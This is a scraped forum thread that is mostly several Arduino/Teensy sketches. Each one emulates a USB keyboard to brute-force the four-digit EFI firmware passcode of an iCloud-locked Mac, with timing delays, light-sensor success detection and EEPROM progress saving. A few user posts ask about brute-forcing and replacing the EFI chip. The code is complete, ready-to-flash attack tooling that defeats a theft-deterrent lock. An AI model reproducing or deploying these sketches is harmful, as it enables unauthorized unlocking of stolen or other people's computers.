#include <usb_keyboard.h>
// This code was developed and written by Overtech
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter <= 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
//sending second digit
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
//sending third digit
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
//sending forth digit
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
//sending enter
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}
#include <usb_keyboard.h>
// This code was developed and written by Overtech
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13;
int counter = 0;
//waits for iCould
int firstloop = 0;
int secondloop = 0;
int thirdloop = 0;
boolean firstcompleted = false;
boolean secondcompleted = false;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
digitalWrite(ledPin, LOW);
}
void loop(){
keyboard_modifier_keys = 0;
//lets wait 1minute and 1 second
if (firstloop >= 5){
delay(61000);
firstcompleted = true;
digitalWrite(ledPin, LOW);
}
else if ((firstloop < 5) && (firstcompleted == false)){
digitalWrite(ledPin, HIGH);
++firstloop;
digitalWrite(ledPin, LOW);
}
//lets wait 5 minutes and one second
if ((secondloop >= 1) && (secondcompleted == false) && (firstcompleted == true)){
delay(301000);
secondloop = 0;
secondcompleted = true;
digitalWrite(ledPin, LOW);
}
else if ((secondloop < 1) && (secondcompleted == false) && (firstcompleted == true)){
++secondloop;
digitalWrite(ledPin, LOW);
}
//lets wait 15 minutes and 1 second
if ((thirdloop >= 1) && (secondcompleted == true)){
delay(901000);
thirdloop = 0;
secondcompleted = false;
firstcompleted = false;
firstloop = 0;
secondloop = 0;
thirdloop = 0;
digitalWrite(ledPin, LOW);
}
else if ((thirdloop < 1) && (secondcompleted == true)){
++thirdloop;
digitalWrite(ledPin, LOW);
}
//lets get to work
if (counter <= 9999){
delay(100503);
digitalWrite(ledPin, LOW);
delay(7049);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
Keyboard.press(KEY_ENTER);
delay(405);
Keyboard.release(KEY_ENTER);
digitalWrite(ledPin, LOW);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
/*******************************************************************************************\
| TITLE: Mac Attack DATE: 1/27/2016 |
| AUTHOUR: John Neal ALIAS: thaGH05T |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/. |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it |
| has been locked down by iCloud and the EFI passcode has not been previousely set. |
| Additioonally it is able to detect when the correct code has been entered by using an LDR.|
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add logic for a display and functionallity that lets the user determine the |
| iteration delay, light threshld, brute force digits, and keypress delay. I will likely |
| add quick attacks such as common passcodes that will include 1950 and ^. |
\*******************************************************************************************/
#include <usb_keyboard.h>
const int readPin = A0; // Analog read pin of the LDR.
const int ledPin = 13; // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d"; // sprintf() format, %04d = 4 digits.
int bfDigits = 9999; // Brute force eventuallity, how hight to count.
int iterDelay = 14000; // Iteration delay, adjust as needed.
int lightThresh = 100; // Threshold of LDR, depends on resistor value.
int count = 0;
char code[4];
void setup() {
keyboard_modifier_keys = 0;
pinMode(ledPin, OUTPUT);
delay(5000);
}
void loop(){
int lightVal = analogRead(readPin);
//Serial.println(lightVal); // Print LDR value to serial to manually determine lightThresh.
if (lightVal < lightThresh){
if (count <= bfDigits){
sprintf(code, digits, count);
for (int i=0; i < 4; i++){
digitalWrite(ledPin, HIGH);
Keyboard.press(code[i]);
delay(200);
digitalWrite(ledPin, LOW);
Keyboard.release(code[i]);
delay(200);
}
Keyboard.press(KEY_ENTER);
delay(200);
Keyboard.release(KEY_ENTER);
delay(iterDelay);
count++;
}
else if (count > bfDigits){
while (1){
for (int i=0; i < 3; i++){
digitalWrite(ledPin, HIGH);
delay(100);
digitalWrite(ledPin, LOW);
delay(100);
}
delay(500);
}
}
}
else if (lightVal > lightThresh){
while (1){
for (int i=0; i < 3; i++){
digitalWrite(ledPin, HIGH);
delay(100);
digitalWrite(ledPin, LOW);
delay(100);
}
delay(500);
}
}
}
Please Log in or Create an account to join the conversation.
/*******************************************************************************************\
| TITLE: Mac Attack DATE: 1/27/2016 MODIFIED: 3/13/2016 |
| AUTHOUR: John Neal ALIAS: thaGH05T |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/. |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it |
| has been locked down by iCloud and the EFI passcode has not been previousely set. |
| Additioonally it is able to detect when the correct code has been entered by using an LDR.|
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add common 4 digit codes as well as birthdate ranges. Add buttons for quick |
| variable setting. Port over to LCD for usability and versatility of configuration and |
| attack methods. |
\*******************************************************************************************/
/*******************************************************************************************\
| WARNING: This sketch potentially writes 10,000 times to a single address of memory. |
| Each address can become unreadable after 100,000 writes, so it is recommended that you |
| change saveAddress before each use. |
\*******************************************************************************************/
#include <usb_keyboard.h>
#include <SevSeg.h>
#include <EEPROM.h>
const int readPin = A0; // Analog read pin of the LDR.
const int ledPin = 13; // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d"; // sprintf() format, %04d = 4 digits.
int bfDigits = 9999; // Brute force eventuallity, how hight to count.
int iterDelay = 14000; // Iteration delay, adjust as needed.
int lightThresh = 100; // Threshold of LDR, depends on resistor value.
int saveAddress = 1337; // Addrress where the last entered digit is stored.
byte numDigits = 4; // Number of digits your 7 segment display has.
byte digitPins[] = {9, 10, 11, 12}; // Digit pins, has to be in order from first to last digit.
byte segmentPins[] = {1, 2, 3, 4, 5, 6, 7, 8}; // Segment pins, has to be in order from A to G. Last array object should be the "." dot.
char code[4]; // Define the how many digits are in the code array. (change this to the count of bfGigits)
int setupDelay = 5000; // This is the time in millisecons that the EFI code or last number entered will be displayed as well as how -->
// long the initial countdown to start brute forcing will be.
SevSeg sevseg; //Instantiate a seven segment object.
void setup() {
sevseg.begin(COMMON_ANODE, numDigits, digitPins, segmentPins);
sevseg.setBrightness(10);
keyboard_modifier_keys = 0;
pinMode(ledPin, OUTPUT);
//Serial.begin(9600); // Begin serial if calibrating lightThresh.
int efiStartTime = millis();
int efiEndTime = efiStartTime;
int savedEFI = readWord(saveAddress);
while ((efiEndTime - efiStartTime) <= setupDelay){
sevseg.setNumber(savedEFI,5);
sevseg.refreshDisplay();
efiEndTime = millis();
}
}
int bfCount = 0; //readWord(saveAddress); // Determines where to start the brute force count. "0" To begin BF, "readWord(saveAddress)" to start from power failure.
int doOnce = 1;
void loop(){
if (doOnce == 1){
int startTime = millis();
int endTime = startTime;
while ((endTime - startTime) <= setupDelay + 10){
int delayMath = endTime / 1000 - 10;
int modDelay = delayMath * -1;
sevseg.setNumber(modDelay,5);
sevseg.refreshDisplay();
endTime = millis();
}
doOnce = 0;
}
int lightVal = analogRead(readPin);
//Serial.println(lightVal); // Print LDR value to serial to manually determine lightThresh.
if (lightVal < lightThresh){
if (bfCount <= bfDigits){
sprintf(code, digits, bfCount);
for (int i=0; i < 4; i++){
digitalWrite(ledPin, HIGH);
Keyboard.press(code[i]);
delay(200);
digitalWrite(ledPin, LOW);
Keyboard.release(code[i]);
delay(200);
}
Keyboard.press(KEY_ENTER);
delay(200);
Keyboard.release(KEY_ENTER);
int startTime = millis();
int endTime = startTime;
while ((endTime - startTime) <= iterDelay){
sevseg.setNumber(bfCount,5);
sevseg.refreshDisplay();
endTime = millis();
}
bfCount++;
writeWord(saveAddress, bfCount);
}
else if (bfCount > bfDigits){
while (1){
for (int i=0; i < 3; i++){
digitalWrite(ledPin, HIGH);
delay(100);
digitalWrite(ledPin, LOW);
delay(100);
}
delay(500);
}
}
}
else if (lightVal > lightThresh){
writeWord(saveAddress, bfCount);
while (1){
sevseg.setNumber(bfCount,5);
sevseg.refreshDisplay();
}
}
}
void writeWord(unsigned address, unsigned value){
EEPROM.write(address, highByte(value));
EEPROM.write(address+1, lowByte(value));
}
unsigned readWord(unsigned address){
return word(EEPROM.read(address), EEPROM.read(address+1));
}
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(23,22,16,15,14,13);
const int ledPin = 13; // choose the pin for the LED
int counter = 0; //Start eingabe
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
lcd.begin(16, 2);
lcd.print("CODE INPUT");
pinMode(ledPin, OUTPUT); // declare LED as output
delay(9000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter <= 9999){
delay(7300);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(300);
Keyboard.release(pin[0]);
delay(300);
//sending second digit
Keyboard.press(pin[1]);
delay(300);
Keyboard.release(pin[1]);
delay(300);
//sending third digit
Keyboard.press(pin[2]);
delay(300);
Keyboard.release(pin[2]);
delay(300);
//sending forth digit
Keyboard.press(pin[3]);
delay(300);
Keyboard.release(pin[3]);
delay(300);
//sending enter
Keyboard.press(KEY_ENTER);
delay(300);
Keyboard.release(KEY_ENTER);
lcd.setCursor(0, 1);
lcd.print(pin[0]);
lcd.setCursor(1, 1);
lcd.print(pin[1]);
lcd.setCursor(2, 1);
lcd.print(pin[2]);
lcd.setCursor(3, 1);
lcd.print(pin[3]);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(5300);
}
++counter;
fakecounter = counter;
}
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
muhdhafiz wrote: Hi Guys,
I have tried this Bruteforce attack on my MBP for 2-3 round which takes about a months but still unable to get through the 4digit code to enter recover mode.
My question is, EFI lock for MBP late 2013 Model A1502 ONLY contains 4digit or it can be anything alphabet + numeric + symbol?
Thank You.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
muhdhafiz wrote: Thanks for your reply.
My next question is, If I buy this A1502 EMC2678 chip from ebay which is the same model as mine( www.ebay.com/itm/BIOS-EFI-Firmware-Chip-for-Apple-MacBook-Pro-13-A1502-Late-2013-EMC-2678-/141446028030 ) and straight away take out the old emc chip and replace with the new one. Will it work? or I still need to do some tweak in the bin file.
Thank You.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
We have 1051 guests and no members online
This website uses cookies to manage authentication, navigation, and other functions. By using our website, you agree that we can place these types of cookies on your device.
You have declined cookies. This decision can be reversed.
You have allowed cookies to be placed on your computer. This decision can be reversed.
This website uses cookies to manage authentication, navigation, and other functions. By using our website, you agree that we can place these types of cookies on your device.